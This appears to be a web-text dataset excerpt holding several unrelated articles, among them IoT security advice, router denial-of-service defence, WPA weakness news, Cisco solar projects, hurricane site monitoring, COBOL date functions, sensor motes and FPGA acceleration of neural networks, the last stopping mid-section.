text stringlengths 234 589k | id stringlengths 47 47 | dump stringclasses 62 values | url stringlengths 16 734 | date stringlengths 20 20 ⌀ | file_path stringlengths 109 155 | language stringclasses 1 value | language_score float64 0.65 1 | token_count int64 57 124k | score float64 2.52 4.91 | int_score int64 3 5 |
|---|---|---|---|---|---|---|---|---|---|---|
IoT is now pervasive and often represents a security weak link in enterprises. It’s far past time for organizations to account for IoT as part of their core endpoint security and edge security strategies.
Read on to learn about the top IoT security vulnerabilities, as well as best practices for your hardening your IoT environment and reducing risk.
The Expanding IoT Threat Landscape
The Internet of Things (IoT) refers to the growing network of physical devices, vehicles, and home appliances always connected to the internet. These devices are collecting and sharing data, which is creating new opportunities for businesses and consumers alike. IoT is also powering edge computing networks, allowing delivery of data closer where it is needed. This has implications for everything from self-driving cars to remote monitoring of operational technology (OT).
However, IoT and IIoT (industrial IoT) continue to pose massive security risks. Over the years, we’ve seen devastating botnets (Mirai, Meris, etc.) comprised of inadequately secured IoT endpoints leveraged by attackers to perpetrate devastating attacks at so devastating, the world to shuddered. We’ve also seen IoT as part of sensitive industrial controls systems compromised, putting actual lives at risk. Further, we’ve all heard tales of the creepy IoT-embedded dolls and other kids toys attackers have exploited to eavesdrop and invade privacy.
An increase in IoT, coupled with adoption of 5G, means IoT risk can be expected to increase in the coming years. 5G offers faster internet speeds and more reliability than ever before. However, 5G also comes with its own set of security risks to consider. One of the benefits of 5G is how it will enable more devices to be connected to the internet. Cyber criminals will have more opportunities to target devices, with the potential to create IoT botnets at far greater scale than ever seen before.
Top IoT Security Risks & Vulnerabilities
Now, let's look at some of the top IoT security vulnerabilities and how to harden your devices to prevent or mitigate them.
1. Unsecure Communications
One of the biggest risks associated with IoT is unsecure communications. Data transmissions between devices is susceptible to interception by third parties. This could allow threat actors to gain access to sensitive information, like user passwords or credit card numbers.
Security Controls: Leverage encryption to protect data in transit, whenever possible. If you are unable to encrypt data in transit, then try to isolate the network in which the device resides. Segmentation will help reduce attack vector associated with the device. Organizations can use BeyondTrust’s Privileged Remote Access to consolidate the access to these segmented networks in a secure and encrypted manner.
2. Lack of IoT Security Updates
Once a device is released, it's up to the manufacturer to provide updates to address new security risks. However, many IoT / IIoT manufacturers do not release timely updates. Many manufacturers stop releasing updates altogether after a certain point. This leaves IoT devices vulnerable to attack from known security flaws.
Security Controls: To protect against this, businesses should only use devices from manufacturers who have a good track record of releasing timely updates. To offset this risk, it is important your vulnerability management system is capable of scanning IoT devices, so be sure to add them to your list of devices that are scanned. If you are unable to automate device patching, then attempt to fingerprint the devices as best you can. If there are no facilities enabled for you to install the patch, then at least you will know the potential vulnerabilities associated with the device. Then, you can take other mitigating actions to protect it.
3. Insufficient Authentication and Password Hygiene
Insufficient authentication hygiene means the device lacks adequate measures to verify users are who they claim to be. This could allow external attackers, as well as insider threat actors, to access IoT endpoints and systems that should be off-limits.
Security Controls: To protect against this threat, businesses should use strong authentication methods, like two-factor authentication or biometrics. In addition, drive access to IoT devices through a secure centralized infrastructure access solution like Privileged Remote Access. Also implement a method for:
a) discovering new IoT devices as they are added to your network, and
b) rotating the passwords associated with the accounts on the device.
Almost all devices have one or more privileged accounts that are part of the operating system. You can use a solution like BeyondTrust Password Safe to discover, onboard, and systematically manage these passwords. But since IoT devices usually have very lightweight operating systems, it's not possible to install an agent on the device to enforce security policies for accounts. So, you need to take other steps, like network segmentation and good password hygiene, to protect your IoT devices.
Best Practices for Hardening Your IoT Security
IoT continues to revolutionize how businesses operate and how consumers live their lives. It is a key part of the digital transformation wave on which so many companies are now riding. However, many organizations have still not adequately considered how to protect IoT as part their overall cybersecurity planning.
This blog has highlighted some of the top IoT vulnerabilities as well as steps you can take to protect against them. By taking these precautions, you can help ensure your business is safe from the primary attack vectors.
Tal Guest, Senior Director of Product Management
Tal Guest is a Director of Product Management with over 20 years of industry experience. He directs a group of product managers, responsible for expanding privileged access management core capabilities in the areas of remote access and the service desk. Tal also helps establish long-term business strategies based on current/future market conditions and problems faced in the privileged access management area of cybersecurity. | <urn:uuid:c89fb402-f17d-4574-9c69-4501865d8476> | CC-MAIN-2022-40 | https://www.beyondtrust.com/blog/entry/top-iot-security-vulnerabilities | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334912.28/warc/CC-MAIN-20220926144455-20220926174455-00340.warc.gz | en | 0.943782 | 1,167 | 2.71875 | 3 |
Did you know that every hour the sun beams onto Earth more than enough energy to satisfy global energy needs for an entire year? Or that solar energy produces little to no greenhouse gasses? Clearly, solar power has the potential to reduce our reliance on other forms of energy, but how do we harness it?
Cisco is taking up the challenge in a number of ways:
1. We recently installed a 264-kilowatt roof-mounted solar photovoltaic (PV) system at our data center in Richardson, Texas. (Solar PV systems convert sunlight into electricity and can be used to power just about anything that uses electricity from homes and businesses to cars and of course, IT equipment!). This particular system will produce approximately 370,000 kilowatt hours annually, equivalent to the annual electricity use of 30 U.S. homes.
The system uses 1,078 solar panels that cover over 35,000 square feet of roof space — if laid end to end, they would stretch out over 1 mile long! Check out this great time-lapse video of the entire installation:
2. Cisco also has two other 100-kilowatt solar PV systems installed at our data centers in Allen, Texas and Research Triangle Park, North Carolina. Starting in 2014, we will expand the existing system in Texas by an additional 339 kilowatts and install our largest solar system to date in Bangalore, India: a 940-kilowatt roof-mounted system covering 7 of our campus buildings.
Both of these projects are expected to be completed by July 2014, which will quadruple our company-wide onsite solar capacity to more than 1.7 megawatts, equal to the annual electricity use of approximately 206 U.S. homes.
Cisco recently set a series of new corporate energy and sustainability goals and to achieve these goals, we will be implementing many energy efficiency and renewable energy projects between now and our 2017 goal year.
These solar PV projects are just the beginning, so stay tuned to hear more details about the rest of our projects in the near future! | <urn:uuid:bd09b7b0-8a4e-47bd-a6da-261600a5dcfe> | CC-MAIN-2022-40 | https://blogs.cisco.com/csr/cisco-is-picking-up-speed-with-solar | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.31/warc/CC-MAIN-20220927225413-20220928015413-00340.warc.gz | en | 0.932876 | 422 | 2.859375 | 3 |
Artificial intelligence (AI) is an immensely helpful tool for businesses and consumers alike. By processing data quickly and predicting analytics, AI can do everything from automating systems to protecting information.
In fact, keeping data secure is a significant part of what AI does in the modern world, though some hackers use technology for their own means.
The more we use artificial intelligence for protection, the more likely we’re able to combat high tech hackers. Here are just a few ways AI is securing our data.
Many hackers use a passive approach where they infiltrate systems to steal information without upsetting operations. These passive attacks can take months or even years to notice if found at all. With AI, businesses can detect a cyberattack in advance or as soon as the hacker enters the system.
The volume of cyber threats is massive, especially since many hackers can automate the job. Unfortunately, these attacks are too much for humans to fight against alone. AI, however, is the best multitasker there is, able to find malicious threats instantly and alert humans or lock the attacker out.
Part of the detection process is to predict activity before it can happen. The New York Police Department made one of the earliest implementations of predictive technology in 1995. Their software, CompStat, has philosophy and organization skills in mind. This predictive policing technique soon spread to other police stations across the United States.
Being high alert at all times is difficult, even for AI and other forms of automated software. By predicting threats, systems can create specific defenses before an attack takes place. With this technique, the system runs with as much efficiency as possible without sacrificing security, especially since there are measures in place at all times.
While detecting a threat entering a system is fantastic, the goal is to make sure they can’t enter at all. Companies can build up walls of defense in many ways, one of those being camouflaging data completely. When information is moving from one source to another, it’s particularly susceptible to attacks and theft. Therefore, businesses need encryption along the way.
Encryption is merely changing the data to something that seems meaningless, like a code, which the system then decrypts on the other side.
Meanwhile, any hacker viewing the information will see random bits of text with no apparent meaning. Programs like iManage, which works with law firms and corporate legal departments, implement encryption as the first line of defense.
Passwords are the baseline of cybersecurity. While they’re so common that many hackers can bypass them easily, going without one is asking for someone to steal your data. Luckily, applying AI into the mix can make passwords more secure.
Before, a password was a word or phrase. In the modern era, words don’t cut it. Instead, companies use movements, patterns and biometrics to unlock information. Biometrics refers to using something unique to one’s body to open something, like retinal scans and fingerprints.
Apple’s iPhone X, for instance, uses a feature called Face ID, which scans your facial features with infrared sensors and turns that information into a password.
One thing better than having an incredibly good password is to have a lot of them. However, the multi-factor aspect changes how these codes work. Sometimes, being in a different location will require a user to enter a unique password. Paired up with the AI’s detection system, the characters can even change.
By allowing itself to be dynamic and working in real-time, access can modify itself in the event of an attack. Multi-factor doesn’t just create multiple walls of security but is also smart about who it lets in.
This system learns about the people entering into the network, making patterns of their behavior and habits to cross-reference with malicious content and determining their access privileges.
AI technology can think for itself, more or less. It can detect patterns, find faults and even execute plans to fix issues. In the realm of cybersecurity, this system creates a whole new layer of protection.
With the addition of artificial intelligence, the entire aspect of cybersecurity has changed forever and continues to evolve at a rapid pace. The more advances we reach, the more the field will change. A decade from now, we may not even recognize security features from when the internet first came about. | <urn:uuid:a484b849-363c-4d42-9e57-225358be86fe> | CC-MAIN-2022-40 | https://securityaffairs.co/wordpress/98120/security/artificial-intelligence-secure-sensitive-information.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.31/warc/CC-MAIN-20220927225413-20220928015413-00340.warc.gz | en | 0.943802 | 891 | 3.234375 | 3 |
As the climate crisis intensifies, extreme weather events such as storm surges, heatwaves, hurricanes and wildfires are becoming more and more frequent. While plans to cut emissions by 2030 were recently laid out by world leaders at the COP26 summit, adequate preparation for extreme weather phenomena is growing in importance globally.
The science of numerical weather forecasting plays a vital role in this preparation. By predicting future weather events based on current climate data, organisations like the European Centre for Medium-Range Weather Forecasting (ECMWF) are working to alertauthoritiesof upcoming extreme weather events earlier and with greater accuracy so interventions can be made to protect property and infrastructure, and potentially to save lives.
Today, the ECMWF is using AI alongside traditional HPC algorithms to run their large-scale simulations faster than ever before. Their team has developed and published a series of deep learning models investigating the use of AI in numerical weather forecasting. The ECMWF is particularly interested in enhancing the accuracy of their weather prediction models by improving the computational efficiency of their models in order to increase model resolution.
50x Faster Weather Predictions with IPUs
We took one of ECMWF’s publicly available forecasting models – a Multi-Layer Perceptron (MLP) – and accelerated it on Graphcore IPU-POD systems with dramatic results. The IPU-POD system was shown to train the ECMWF’s predictive MLP model 5x faster than a leading GPU and a massive 50 times faster than ECMWF’s existing simulation methods running on a CPU.
In their paper examining machine learning in weather forecasting, the ECMWF showed that their machine learning-based emulators performed 10 times faster on GPU hardware compared to their existing scheme on a CPU, the IPU is a massive 50 times faster than ECMWF’s existing simulation methods running on a CPU.
Thespeed-up with the IPU system was achieved without any optimisation or changes to the MLP model or its parameters, and only very few modifications to the code. The model trains well, showing low values for the loss and Root Mean Square Error (RMSE) on both the training and validation datasets after just a few epochs, demonstrating the high accuracy of the model’s predictions.To learn more about how IPUs accelerated the ECMWF’s MLP model, watch our code tutorial video.
The project was supported by ECMWF and Atos' AI4SIM team members, Alexis Giorkallos and Christophe Bovalo.
Leveraging IPU Hardware at the Convergence of HPC and AI
Beyond weather forecasting, IPU hardware has also been shown to accelerate many other scientific research applications where both HPC and AI are used. From protein folding and computational fluid dynamics to cosmology and high-energy physics, leading research institutions have found they can accelerate their workloads, pursue new directions of research and achieve higher accuracy results with IPU systems.
Cedric Bourrasset, Head of the High Performance AI Business Unit at Atos, a Graphcore partner, sees great potential for IPUs in this space: “The use of AI in traditional HPC applications is one of the most exciting developments in computing today and Graphcore’s IPU is showing just how transformative that new approach can be.
“Graphcore plays a central role in Atos’ Think AI solution, helping customers take advantage of the many benefits that AI is bringing to HPC – whether that’s delivering faster and more accurate simulations, improving cost efficiency, or opening up new areas of research and commercial applications. The possibilities are vast and they’re growing every day – driven in large part by the innovative work that is being done on the IPU.” | <urn:uuid:eb31cfb4-8e7d-44d0-ad2a-676ab8f36f2c> | CC-MAIN-2022-40 | https://www.graphcore.ai/posts/climate-change-foreseeing-the-unexpected-with-graphcore-ipus | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.31/warc/CC-MAIN-20220927225413-20220928015413-00340.warc.gz | en | 0.940304 | 781 | 2.890625 | 3 |
As hurricane season approaches, are we ever really prepared? The National Oceanic and Atmospheric Administration predicts a 40% chance of a near-normal hurricane season in 2019 and a 30% chance of an above-normal season. Already, Louisiana has felt the effects.
The difficulties faced by companies with large geographic footprints and many remote unmanned sites are multiplied by the onslaught of hurricane season. Even relatively nearby operations become effectively "remote" when a heavy storm strikes. Also, hurricane damage can cover a broad swath of a company's territory, taking down not one but dozens of important remote equipment sites.
For telecom, utilities, railroads, and large industrial companies to plan and organize their response and recovery efforts in the short-term, they must develop and implement a robust hurricane monitoring system for remotely managing equipment and assets.
As we've learned over the course of increasingly more intense and frequent storms in past decades: while hurricanes may be over in a day or a week, their effects can linger for years. For telecom, utilities, railroads, and large industrial companies to plan and organize their response and recovery efforts in the short-term, they must develop and implement a robust hurricane monitoring system for remotely managing equipment and assets.
Hurricane monitoring systems for companies help inform recovery not by tracking the storm as it develops and approaches, but by providing a real-time map of equipment concerns and damage. This allows companies to keep a growing record of affected assets and damage to equipment sites. Information provided by equipment monitoring systems can tell company managers whether sites are slightly, moderately, or severely affected, or not at all.
Knowing this allows management to marshall their responses over the days, weeks, and months which follow landfall.
By comparing damage reports to system function maps, resources can be applied as needed at the most essential sites. If certain sites need to come back online immediately to restore function, these can be prioritized.
While this method is hardly new - go see what's broken, then plan to fix it - it does improve on earlier disaster mitigation strategies by reducing legwork and consequent costly delays. Without a system capable of monitoring unmanned sites remotely, companies would need to send trained employees to each site. This would include every site affected by the storm. And, it can be a very time-consuming process for several reasons.
First, while companies employ many trained technicians, they don't usually employ enough to staff every site (and that would be wasteful even if it was possible). If each company site is potentially affected, then a small number of technicians must make a large number of diagnostic visits. That needs to happen before anyone can start planning to fix anything.
Even though the storm has blown over by the time this "recovery" stage arrives, the damage it causes is likely to linger, blocking roads with fallen trees or washing them entirely off the sides of hills. Remember, distance is measured in time: a site that's ten miles away is ten minutes away on the open highway. It's half a day or more away if that highway is impassable.
As downtime costs money, this is a problem which becomes relentlessly more expensive.
Also, local employees will likely have family and friends in the area who need help, and may not be able to fully devote themselves to their work immediately. Employees' homes may also have been affected. As a result, companies may face significant difficulty in even diagnosing the damage the storm does to their property. As downtime costs money, this is a problem which becomes relentlessly more expensive.
With a robust remote monitoring system in place before a hurricane strikes, this diagnostic phase can be shortened. Remote Terminal Units (RTUs) are monitoring tools designed to report on conditions in unmanned locations. On sunny days, RTUs track a range of inputs customized to equipment tolerances, including temperature, humidity, wind speed, vibration, inches of water on the floor, and even generator fuel levels and other info gleaned from local IoT connections.
When an input approaches a level dangerous to equipment, the RTU sends an alert to technicians. If there are more than ten sites (and RTUs) in a network, field data from RTUs are displayed by a central master station.
Then, company management can view a comprehensive, real-time map of remote site conditions across the network. This lets management know of issues to correct without the need to send diagnostic technicians.
When the ocean is in an uproar, RTUs keep reporting all the same information. Inputs on humidity, wind speed, and water levels become increasingly important. They are primary indicators of storm intensity and damage potential.
By collecting information from RTUs as a storm moves (or sits) over a company's geographic footprint, management will have an up-to-the-minute map of which sites are the most affected by the storm. When the storm dies down eventually, and it's safe to go back to work, then local technicians can be dispatched intelligently to assess the worst damage and start repairing what they can.
Local resources are likely to be overwhelmed by the scale of the damage a hurricane can cause. While the storm is progressing and in the immediate aftermath, company managers can be drawing up resource orders for employees and emergency contractors hired from other regions.
The real-time information provided by RTUs can help itemize damage early, helping management order the right amount of private (and sometimes national) resources to effectively and quickly respond to a crisis. Trucks can be rolling before the rain stops falling.
Telecom, utility, railroad, and industrial companies with large physical footprints do well by having RTUs at their unmanned sites even when the weather is fine. But when a disaster strikes, these already-useful hurricane monitoring system tools become extremely valuable. Remote monitoring provides real-time information about storm conditions where workers can't go. This allows company managers to get their networks or plants back up and running as soon as possible when the skies clear up, helping their customers return to normalcy.
DPS Telecom's remote monitoring solutions have helped companies plan disaster recovery efforts numerous times in the past decades. Our solutions are effective for normal operations and emergent circumstances. To learn more, get a quote today!
Image Courtesy Shutterstock
You need to see DPS gear in action. Get a live demo with our engineers.
Have a specific question? Ask our team of expert engineers and get a specific answer!
Sign up for the next DPS Factory Training!
Whether you're new to our equipment or you've used it for years, DPS factory training is the best way to get more from your monitoring.Reserve Your Seat Today | <urn:uuid:644265c3-2ce6-4987-b0d1-b7774825fc69> | CC-MAIN-2022-40 | https://www.dpstele.com/insights/2019/08/08/hurricane-monitoring-system-strategies-remote-equipment-observation-automated-alerts/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335491.4/warc/CC-MAIN-20220930145518-20220930175518-00340.warc.gz | en | 0.952731 | 1,353 | 2.515625 | 3 |
We all yearn for the more innocent time when the acronym DOS stood for your Disk Operating System, or even the Dept. of State for the better traveled. Today, however, it is a term that brings a chill to many technologists — Denial of Service. Initially, this was largely the realm of minor miscreants, who wanted no more than to target specific Web sites they thought would be cool to disrupt. But now a greater chill has begun to set in as a result of the selective targeting of routers.
Of late, the hacker community has taken to discussing ‘router protocol attacks’ in listservs, Usenet, and at conferences. Attacks against routers can have serious consequences for the Internet at large. Routers can be used for direct attacks against the routing protocols that interconnect the networks comprising the Internet, therefore causing serious service availability issues on a large scale. By dealing with such threats to their infrastructures, network managers will be protecting both their own interests and the interests of all networks to which they connect.
Crackers perceive router attacks as attractive for several reasons. Unlike computer systems, routers are generally buried within the infrastructure of an enterprise. Often, they are comparatively less protected by monitors and security policies than computers, providing a safer harbor within which the miscreant can operate. Many routers are poorly deployed, with the vendor-supplied default password the only wall between network security and ruination. Documents circulate supplying advice on procedures for breaking into a router and changing its configuration. Once compromised, the router can be used as a platform for scanning activity, ‘spoofing’ connections, (disguising the origin of packets,) and as a launch point for DoS attacks.
According to Laurie Vickers, a Senior Analyst at Cahners In-Stat Group, “A router is the gateway to a company. They have been the target of hackers and Script Kiddies for quite some time now, but what seems to be occurring is that the hackers are growing more sophisticated. They’re finding that the front door is locked, so they go around back and see that the patio door has been left open.”
Vickers asserts that router attacks can prove devastating to networks as managers try to determine “Which box will it be? Routers often integrate VPN services and/or firewalls, and these make them even juicier targets.” Once the router is compromised, the entire network can be up for grabs.
A further area for concern is what Carnegie Mellon’s Computer Emergency Response Team (CERT) Coordination Center refers to as the shrinkage of ‘Time-To-Exploit’. In other words, once a vulnerability in a system or device has been discovered, it takes less time for to exploit it perhaps less time than it takes to author or deploy a security patch.
Further, don’t look for a particular group or individual to target your systems. Tools used to initiate DoS attacks and to propagate the ‘attack toolkits’ (the collection of instructions used for the attack) are increasingly automated. Scripts are frequently used for scanning, exploitation, and deployment.
What To Do?
Traditional security solutions are often outwitted by DoS attacks. Firewalls and Intrusion Detection Systems (IDS) are designed to detect attacks against individual Web servers or hosts — not the network infrastructure.
To combat this, several companies have worked on solutions specific to DoS attacks. Arbor Networks helped pioneer this field with their product, PeakFlow DoS, which deploys data collectors which analyze traffic flow (before it reaches the enterprise’s routers or firewalls) and searches for anomalies. Such intelligence is forwarded to a controller, which in turn attempts to trace the attack back to its source. In the meantime, the controller sends filter recommendations to the network managers, which can be deployed to attempt to divert the attack. Prices for enterprise deployment begin at $130,000, and there are plans to provide similar protection as a monthly-billed service for smaller networks.
Tripwire‘s Tripwire for Routers takes a more modest approach of monitoring a Cisco router’s startup and configuration files, and notifying you of any changes from that device’s trusted state. (The router needs to be running IOS 11.3, 12.0, or 12.1.) It is currently only available for Solaris 7 or 8 workstations; a Windows 2000 version is forthcoming. Pricing is scaled based on how many routers will be covered, and an evaluation version of the software is available for download.
On the low end, some common sense is your first, and perhaps your best defense. Make sure you’re aware of every connection from the outside world that has access to your router. Be sure that you have changed the default security configurations, especially the password. We have more information in Protect Your Network From a DoS Attack.
These new trends in DoS attacks demonstrate that threats to availability of service — be they against a network or the Internet at large — are likely to become more sophisticated as time goes on. Aside from the impact on your network, lack of diligence on router and infrastructure security could make you an unwitting conveyor of DoS attacks. Stay aware of developments, and hold yourself accountable for your network’s security on all fronts, and you should be able to avoid disaster. | <urn:uuid:312e0d64-0a42-4d56-9d03-cca43faf52e7> | CC-MAIN-2022-40 | https://www.enterprisenetworkingplanet.com/security/dos-attacks-go-for-the-throat/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337404.30/warc/CC-MAIN-20221003070342-20221003100342-00340.warc.gz | en | 0.949927 | 1,116 | 2.609375 | 3 |
It’s been known for years that the Wired Equivalent Privacy or
WEP protocol is easily broken, and that to
be secure, wireless networks should use the more powerful protocol called Wi-Fi Protected
Access, or WPA.
Now security experts say they’ve proven that WPA can be breached just as easily. A
pair of researchers in Japan said that they developed a way to break WPA encryption in
about one minute — and will show how at a conference there next month.
WPA’s viability has been in doubt since late 2008, when security researchers Martin
Beck and Erik Tews demonstrated the ability
to break the Temporal Key Integrity Protocol (TKIP) that provides WPA security within 15
Now, Researchers Toshihiro Ohigashi of Hiroshima University and Masakatu Morii of Kobe
University said they’ve improved on that. The pair has already discussed their findings
in a paper presented
at the Joint Workshop on Information Security held in Taiwan earlier this month and will
discuss it again at a
Sept. 25 event in Hiroshima. Read the rest at InternetNews.com. | <urn:uuid:a45794ea-fd64-4ed9-aa82-7983dffcefb6> | CC-MAIN-2022-40 | https://www.enterprisenetworkingplanet.com/security/wpa-goes-down-researchers-claim-one-minute-crack/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337404.30/warc/CC-MAIN-20221003070342-20221003100342-00340.warc.gz | en | 0.912881 | 243 | 2.65625 | 3 |
The CURRENT-DATE function returns a 21-character alphanumeric value that represents the calendar date, time of day, and local time differential factor provided by the system on which the function is evaluated. The type of this function is alphanumeric.
|1-4||Four numeric digits of the year in the Gregorian calendar.|
|5-6||Two numeric digits of the month of the year, in the range 01 through 12.|
|7-8||Two numeric digits of the day of the month, in the range 01 through 31.|
|9-10||Two numeric digits of the hours past midnight, in the range of 00 through 23.|
|11-12||Two numeric digits of the minutes past the hour, in the range 00 through 59.|
|13-14||Two numeric digits of the seconds past the minute, in the range 00 through 59.|
|15-16||Two numeric digits of the hundredths of a second past a second, in the range 00 through 99. The value 00 is returned if the system on which the function is evaluated does not have the facility to provide the fractional part of a second.|
|17||The character '0'. This is reserved for future use.|
|18-19||The characters '00'. This is reserved for future use.|
|20-21||The characters '00'. This is reserved for future use|
MOVE FUNCTION CURRENT-DATE (1:4) TO YEARDATE. | <urn:uuid:c2c4488c-d9eb-4fe7-8eec-d9bb1c0d98a4> | CC-MAIN-2022-40 | https://www.microfocus.com/documentation/extend-acucobol/1031/extend-Interoperability-Suite/BKPPPPINTR001S002F008.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337680.35/warc/CC-MAIN-20221005234659-20221006024659-00340.warc.gz | en | 0.77371 | 340 | 2.640625 | 3 |
Every now and then a hand goes up. I’m continually amazed at how little the IT community knows about these little yet powerful devices. They have been written-up in scientific and computing journals, and yet few IP professionals are aware of their existence.
I had lunch almost two years ago with a VP of IT from one of the large financial services firms. He not only knew about motes but was fascinated by their power potential. He was the exception rather than the rule.
Motes are very small, battery powered computers that allow discrete electronic sensing devices to communicate wirelessly with not only a centralized system, but with each other as well. They share a common, distributed operating system called TinyOS as well as a distributed data base called (you guessed it) TinyDB.
Star Trek fans may remember The Borg—telepathic humanoids that knew each other thoughts and acted as individuals yet with a group consciousness. Think of motes as computing’s version of The Borg.
Motes were originally created by researchers at the University of California at Berkley and Intel. TinyOS and TinyDB are products of the open source community. Development on both the hardware and software fronts is now being pursued by more than 100 groups around the world today who are using motes in a long list of applications.
For example, suppose that you run a chemical manufacturing plant and you need to implement a system that not only detects chemical spills the moment they happen, but also identify the location of the spill and direct workers to a safe location or safe exit from the plant.
You could combine electronic chemical sensing devices with mote technology. Now you have devices that can be deployed quickly and precisely where they need to be because they communicate wirelessly and are battery powered, and can determine the location and direction of movement of a chemical spill because they all communicate with each other. In fact, they form an invisible, sensory mesh.
Here’s what I think is maybe the coolest thing about motes: This incredibly powerful technology is within easy reach of just about anyone with some money to spare and a genuine interest in learning how these little critters work.
You can buy them right now, online, for less than $25.00 each. You could attach motion sensors to them and create a motion detection mesh that could be deployed in a warehouse, or a forest, or even your own house or apartment. On the other hand, a governmental group (large metropolitan city, for example) could arm thousands of them with radiation sensors as defense against a “dirty bomb” attack.
The list of potential applications is as long as the list of things that can be sensed electronically—light, sound, and vibration come to mind immediately.
So now that you know what motes are, give free reign to your imagination. Just Google and you’ll find them. Then ask yourself: What could a small army of motes do for me?
John Webster is senior analyst and founder of Data Mobility Group. He has held the positions of director of Computing Research with Yankee Group’s Management Strategies Planning Service, and Senior Analyst with International Data Corp. He is also the co-author of a book entitled “Inescapable Data – Harnessing the Power of Convergence” (Prentice Hall, 2005). | <urn:uuid:a368066b-0797-4e5e-b05e-f014b563ba79> | CC-MAIN-2022-40 | https://cioupdate.com/shake-hands-with-the-borg/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338001.99/warc/CC-MAIN-20221007080917-20221007110917-00340.warc.gz | en | 0.96984 | 676 | 2.84375 | 3 |
Continued exponential growth of digital data of images, videos, and speech from sources such as social media and the internet-of-things is driving the need for analytics to make that data understandable and actionable.
Data analytics often rely on machine learning (ML) algorithms. Among ML algorithms, deep convolutional neural networks (DNNs) offer state-of-the-art accuracies for important image classification tasks and are becoming widely adopted.
At the recent International Symposium on Field Programmable Gate Arrays (ISFPGA), Dr. Eriko Nurvitadhi from Intel Accelerator Architecture Lab (AAL), presented research on Can FPGAs beat GPUs in Accelerating Next-Generation Deep Neural Networks. Their research evaluates emerging DNN algorithms on two generations of Intel FPGAs (Intel Arria10 and Intel Stratix 10) against the latest highest performance NVIDIA Titan X Pascal* Graphics Processing Unit (GPU).
Dr. Randy Huang, FPGA Architect, Intel Programmable Solutions Group, and one of the co-authors, states, “Deep learning is the most exciting field in AI because we have seen the greatest advancement and the most applications driven by deep learning. While AI and DNN research favors using GPUs, we found that there is a perfect fit between the application domain and Intel’s next generation FPGA architecture. We looked at upcoming FPGA technology advances, the rapid pace of innovation in DNN algorithms, and considered whether future high-performance FPGAs will outperform GPUs for next-generation DNNs. Our research found that FPGA performs very well in DNN research and can be applicable in research areas such as AI, big data or machine learning which requires analyzing large amounts of data. The tested Intel Stratix 10 FPGA outperforms the GPU when using pruned or compact data types versus full 32 bit floating point data (FP32). In addition to performance, FPGAs are powerful because they are adaptable and make it easy to implement changes by reusing an existing chip which lets a team go from an idea to prototype in six months—versus 18 months to build an ASIC.”
Neural network machine learning used in the test
Neural networks can be formulated as graphs of neurons interconnected by weighted edges. Each neuron and edge is associated with an activation value and weight, respectively. The graph is structured as layers of neurons. An example is shown in Figure 1.
Figure 1. Overview of deep neural networks. Courtesy of Intel.
The neural network computation goes through each layer in the network. For a given layer, each neuron’s value is calculated by multiplying and accumulating the previous layer’s neuron values and edge weights. The computation heavily relies on multiply-accumulate operations. The DNN computation consists of forward and backward passes. The forward pass takes a sample at the input layer, goes through all hidden layers, and produces a prediction at the output layer. For inference, only the forward pass is needed to obtain a prediction for a given sample. For training, the prediction error from the forward pass is then fed back during the backward pass to update the network weights – this is called the back-propagation algorithm. Training iteratively does forward and backward passes to refine network weights until the desired accuracy is achieved.
Changes making FPGA a viable alternative
Hardware: While FPGAs provide superior energy efficiency (Performance/Watt) compared to high-end GPUs, they are not known for offering top peak floating-point performance. FPGA technology is advancing rapidly. The upcoming Intel Stratix 10 FPGA offers more than 5,000 hardened floating-point units (DSPs), over 28MB of on-chip RAMs (M20Ks), integration with high-bandwidth memories (up to 4x250GB/s/stack or 1TB/s), and improved frequency from the new HyperFlex technology. Intel FPGAs offer a comprehensive software ecosystem that ranges from low level Hardware Description languages to higher level software development environments with OpenCL, C, and C++. Intel will further align the FPGA with Intel’s machine learning ecosystem and traditional frameworks such as Caffe, which is offered today, and with others coming shortly, leveraging the MKL-DNN library. The Intel Stratix 10, based on 14nm Intel technology, has a peak of 9.2 TFLOP/s in FP32 throughput. In comparison, the latest Titan X Pascal GPU offers 11TFLOPs in FP32 throughput.
Emerging DNN Algorithms: Deeper networks have improved accuracy, but greatly increase the number of parameters and model sizes. This increases the computational, memory bandwidth, and storage demands. As such, the trends have shifted towards more efficient DNNs. An emerging trend is adoption of compact low precision data types, much less than 32-bits. 16-bit and 8-bit data types are becoming the new norm, as they are supported by DNN software frameworks (e.g., TensorFlow). Moreover, researchers have shown continued accuracy improvements for extremely low precision 2-bit ternary and 1-bit binary DNNs, where values are constraints to (0,+1,-1) or (+1,-1), respectively. Dr. Nurvitadhi co-authored a recent work that shows, for the first time, ternary DNN can achieve state-of-the-art (i.e., ResNet) accuracy for the well-known ImageNet dataset. Another emerging trend introduces sparsity (the presence of zeros) in DNN neurons and weights by techniques such as pruning, ReLU, and ternarization, which can lead to DNNs with ~50% to ~90% zeros. Since it is unnecessary to compute on such zero values, performance improvements can be achieved if the hardware that executes such sparse DNNs can skip zero computations efficiently.
The emerging low precision and sparse DNN algorithms offer orders of magnitude algorithmic efficiency improvement over the traditional dense FP32 DNNs, but they introduce irregular parallelism and custom data types which are difficult for GPUs to handle. In contrast, FPGAs are designed for extreme customizability and shine when running irregular parallelism and custom data types. Such trends make future FPGAs a viable platform for running DNN, AI and ML applications. “FPGA-specific Machine Learning algorithms have more head room,” states Huang. Figure 2 illustrates FPGA’s extreme customizability (2A), enabling efficient implementations of emerging DNNs (2B).
Figure 2. FPGAs are great for emerging DNNs.
Study hardware and methodology
|Type||Intel Arria 10 1150 FPGA||Intel Stratix 10 2800 FPGA||Titan X Pascal
(RF, SM, L2)
|Memory BW||Assume same
as Titan X
as Titan X
GPU: Used known library (cuBLAS) or framework (Torch with cuDNN)
FPGA: Estimated using Quartus Early Beta release and PowerPlay
Figure 3. Results of Matrix Multiply (GEMM) test. GEMM is key operation in DNNs. Courtesy of Intel.
Study 1: Matrix multiply (GEMM) testing
